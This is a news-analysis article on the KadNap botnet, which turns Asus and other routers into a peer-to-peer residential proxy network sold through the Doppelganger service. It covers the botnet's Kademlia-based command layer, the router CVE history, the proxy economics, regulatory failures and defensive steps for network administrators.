KadNap Botnet Exposes the Router Security Crisis Nobody Fixed
Fourteen thousand routers are not a crisis. They are a proof of concept. The discovery of KadNap, a malware strain that has quietly conscripted over 14,000 Asus routers and other edge devices into a peer-to-peer proxy botnet, is less a novel threat and more a predictable consequence of an industry that has spent a decade refusing to treat consumer network hardware as critical infrastructure. What makes KadNap worth studying is not its scale, which remains modest by botnet standards, but its architecture: a custom implementation of the Kademlia distributed hash table protocol that represents a meaningful evolution in how botnets hide their command infrastructure. The operators behind KadNap are not just building a botnet. They are building a business, one that sells access to compromised residential IP addresses through a storefront called Doppelganger, and in doing so, they have revealed the ugly economics that make router exploitation one of cybercrime's most reliable revenue streams.
The Kademlia Trick: Why This Architecture Matters
Most botnets rely on a relatively straightforward command-and-control model. Infected devices phone home to a server, receive instructions, and execute them. Take down the server, and the botnet goes dark, at least temporarily. KadNap's operators chose a different path. They built their C2 layer on top of a customized version of the Kademlia distributed hash table, the same protocol that once powered BitTorrent's decentralized peer discovery and still underpins several legitimate peer-to-peer networks.
In a Kademlia network, every node has a unique identifier, and routing happens through a series of iterative lookups across the distributed hash table. No single node knows the full topology. Each compromised router in the KadNap network generates a hash from its device data, joins the DHT, exchanges encrypted data with peers, and uses the distributed lookup mechanism to locate C2 servers. The result is that the actual control infrastructure is hidden behind layers of peer-to-peer indirection. Traditional network monitoring that looks for suspicious outbound connections to known malicious IPs sees only router-to-router traffic that superficially resembles legitimate P2P activity.
This is not entirely new. The Hajime botnet used a similar DHT approach as far back as 2016. But KadNap's implementation is more refined, and researchers at Black Lotus Labs discovered an important weakness: before reaching the C2 servers, infected nodes consistently connect to two specific bootstrap nodes. This reduces the decentralization that a pure Kademlia implementation would achieve and provides defenders with a chokepoint. The lesson is instructive. P2P botnets are theoretically resilient, but in practice, their operators often introduce centralized dependencies that can be targeted. The question is whether defenders will act on this intelligence before the operators patch their own design flaw.
A Decade of Warnings Asus Did Not Heed
The selection of Asus routers as KadNap's primary target is neither random nor surprising. Asus has one of the longest and most documented histories of router security failures of any major manufacturer, and the pattern reveals a structural unwillingness to prioritize firmware security that predates KadNap by years.
In 2016, the Federal Trade Commission settled charges against Asus after hackers placed text files on thousands of consumers' routers, essentially taunting owners that their devices were wide open to the internet. The settlement required Asus to maintain a comprehensive security program and submit to independent audits for 20 years. Nine years into that consent decree, Asus routers remain among the most frequently exploited consumer network devices on the planet.
The vulnerability chain tells the story. In 2023, CVE-2023-39780 disclosed an authenticated command injection flaw in the RT-AX55 line. Through 2024, a series of additional command injection vulnerabilities, CVE-2023-41345 through CVE-2023-41348 and CVE-2024-12912, provided attackers with reliable remote code execution. In early 2025, CVE-2025-2492 added an improper authentication bypass. By mid-2025, CVE-2025-59366, a critical authentication bypass with a CVSS score of 9.2 affecting routers with AiCloud enabled, was patched, but by then KadNap had already been active for months.
The pattern is not one of zero-day exploitation. KadNap does not need zero-days. It exploits known vulnerabilities in firmware that users never update, on devices that manufacturers treat as fire-and-forget products. The infection chain starts with a shell script called "aic.sh" downloaded from a C2 server, which establishes a cron job to periodically fetch and execute payloads disguised as ".asusrouter." The malware targets both ARM and MIPS architectures, covering the vast majority of consumer router hardware. Nothing about this is sophisticated. It is simply thorough.
The Residential Proxy Economy: Where Botnets Become Businesses
The most significant aspect of KadNap is not its technical architecture but its business model. The infected routers are not being used primarily for DDoS attacks or cryptocurrency mining, the traditional monetization strategies for botnets. Instead, they are being sold as residential proxy infrastructure through a service called Doppelganger, believed to be a rebrand of the earlier Faceless proxy service.
Residential proxies are valuable because they route traffic through real consumer IP addresses, making the traffic appear to originate from legitimate home internet connections rather than data centers or known VPN exit nodes. This defeats IP reputation systems, geographic restrictions, and rate limiting. For cybercriminals, residential proxies enable credential stuffing attacks that bypass bot detection, ad fraud that passes verification checks, and reconnaissance that does not trigger security alerts.
The economics are straightforward and lucrative. Legitimate residential proxy services charge anywhere from $5 to $15 per gigabyte of traffic routed through their networks. Criminal proxy services like Doppelganger can undercut those prices dramatically because their marginal cost is essentially zero: the bandwidth is stolen from unwitting router owners, and the infrastructure is the botnet itself. At even a fraction of legitimate pricing, a network of 14,000 nodes generating continuous revenue represents a substantial and recurring income stream.
This business model creates a perverse incentive structure. Unlike DDoS botnets, where the value of an infected device is measured in bandwidth capacity during an attack, proxy botnets generate more revenue when their nodes remain online, undetected, and stable for long periods. This means KadNap's operators are incentivized to keep infected routers running smoothly, avoid noisy behavior that might trigger user complaints, and maintain the malware persistently. The cron job persistence mechanism and the quiet proxy-only functionality reflect this economic logic. These operators do not want your router to crash. They want it to keep running, quietly forwarding traffic, for as long as possible.
The residential proxy market has grown explosively in recent years, driven by demand from both legitimate businesses (market research, ad verification, price comparison) and criminal enterprises. This dual-use nature makes it difficult to regulate or disrupt. When law enforcement takes down a criminal proxy service, its customers simply migrate to another provider, and new services emerge within weeks. Doppelganger's apparent connection to the defunct Faceless service illustrates this lifecycle perfectly.
60% American: Why the U.S. Is the Primary Target
More than 60% of KadNap's infected devices are located in the United States. This concentration is not accidental but reflects several converging factors that make American home networks uniquely attractive targets for proxy botnet operators.
First, American residential IP addresses command a premium in the proxy market. U.S. IPs are required for accessing domestic financial services, e-commerce platforms, and advertising networks, making them the most valuable commodity in the residential proxy ecosystem. Second, the U.S. has an enormous installed base of consumer routers that are rarely updated. Unlike mobile phones, which receive automatic over-the-air updates, most consumer routers require manual firmware updates that the vast majority of users never perform. According to VulnCheck's 2026 State of Exploitation report, 42.5% of exploited vulnerabilities in 2025 affected devices that were end-of-life or likely end-of-life, and consumer routers account for 56% of exploited edge device vulnerabilities.
Third, American broadband connections offer high bandwidth and reliable uptime, which directly translates to proxy service quality. A compromised router on a fiber connection in suburban America is a far more valuable proxy node than one on a congested connection in a developing market. The operators of Doppelganger understand this calculus and have optimized their targeting accordingly.
This geographic concentration also creates a policy problem. The devices are owned by American consumers, operated on American networks, and used to facilitate crimes that often target American companies and individuals. Yet the regulatory framework for consumer device security remains fragmented. The FCC's nascent Cyber Trust Mark program for IoT devices is voluntary and does not cover routers already in the field. The FTC's 20-year consent decree with Asus has demonstrably failed to prevent the company's products from remaining among the most exploited devices in the world.
What Comes Next: Predictions for the Proxy Botnet Arms Race
KadNap's relatively modest scale of 14,000 nodes should not provide comfort. It represents the industrialization of a model that will scale significantly in the coming years, and several specific developments are likely.
First, expect KadNap's operators or their successors to fix the bootstrap node weakness that researchers identified. A fully decentralized Kademlia implementation without consistent centralized chokepoints would be substantially harder to disrupt. The blueprint exists in academic literature on peer-to-peer networks, and the gap between KadNap's current implementation and a more resilient one is not large.
Second, the residential proxy business model will attract more sophisticated operators. The combination of recurring revenue, low operational costs, and strong market demand makes botnet-powered proxy services one of the highest-return criminal enterprises available. As this market matures, expect to see improved customer interfaces, SLA guarantees, geographic targeting options, and integration with other criminal services. The professionalization of cybercrime-as-a-service is well documented, and proxy services are following the same trajectory.
Third, manufacturers will continue to fail at securing edge devices until the economic incentives change. The fundamental problem is that router security is a negative externality. The cost of a compromised router is borne primarily by the victims of the crimes routed through it, not by the router's owner or manufacturer. Until regulation imposes mandatory automatic firmware updates, enforced end-of-life sunset dates, and financial liability on manufacturers for unpatched devices, the supply of exploitable routers will remain abundant.
For security teams and network administrators, the immediate action items are concrete. Audit your network for Asus routers, particularly models in the RT-AX series. Disable remote management (WAN access) on all consumer-grade routers. Implement network monitoring that flags unusual peer-to-peer traffic patterns from edge devices. Replace any router that has reached end-of-life status and no longer receives firmware updates. And recognize that the router sitting in your office closet or your employees' homes is not a passive piece of infrastructure. It is, increasingly, a target with a price on its head.
The KadNap story is ultimately about the collision between the consumer electronics industry's planned obsolescence model and the cybercriminal economy's insatiable demand for clean residential IP addresses. As long as millions of routers sit on networks running firmware that will never be updated, protected by passwords that were never changed, the next KadNap is already being built. The only question is how large the next one will be before anyone with the power to change the incentives actually does.